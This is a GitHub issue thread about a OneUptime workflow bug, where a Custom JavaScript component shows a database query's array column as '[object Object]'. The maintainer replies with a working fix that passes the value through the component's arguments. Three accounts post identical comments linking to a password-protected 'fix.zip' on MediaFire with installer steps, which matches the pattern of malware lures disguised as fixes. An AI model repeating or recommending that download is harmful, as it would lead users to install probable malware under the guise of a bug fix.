### ISSUE TITLE
Cannot access to array properties from a query to database in workflows

### ISSUE THREAD

**Issue by luisxkimo** [OneUptime/oneuptime#1658]
**Describe the bug**
Cannot access to array properties from a query to database in workflows components.

**To Reproduce**
1. Create new workflow and add "database query find one" component
2. Add Custom Javascript component, and try to access to one column of previous componente that returns an array

**Expected behavior**
If you access to the "returned value" from the query that is an array, save this in a variable like an array or at least save like an "string"

**Screenshots**
You can see here that from returned value "labels" as an array, the access to this in next component returns [object Object]

![image](https://github.com/user-attachments/assets/1f02eb06-7f4f-4fd1-bef8-a2e2fbd28b55)

Here is the custom javascript code:

```javascript
stringlabels={{local.components.monitor-find-one-1.returnValues.model.labels}}
// if you use '{{local.components.monitor-find-one-1.returnValues.model.labels}}', then the string '[object Object]' is saved
return stringlabels
```

**Desktop (please complete the following information):**
 - Browser: Edge
 - Version 7.0.2994

**Deployment Type**
Helm chart

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kyy23** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by simlarsen** [comment]
This is not a bug. In the Custom Code component: 

In Code section, you should: 

```
stringlabels= args['labels']
return stringlabels
```

In Arguments box: 

```
{
    "labels": {{local.components.monitor-find-one-1.returnValues.model.labels}}
}
```

**Comment by luisxkimo** [comment]
Hi @simlarsen 

Checked on my side and works as you suggested. 

Thanks for the help.

**Comment by luisxkimo** [comment]
Hi @simlarsen ,

Sorry for miss this info:

API: 8.0.5516 (123d9b07bc9cbda604d89031ae059411a0ea1b62)
Dashboard: 8.0.5516 (123d9b07bc9cbda604d89031ae059411a0ea1b62)

Self-hosted installation (Community edition). Installed via HELM

**Comment by simlarsen** [comment]
Can you please upgrade to latest and see if you still face this issue?
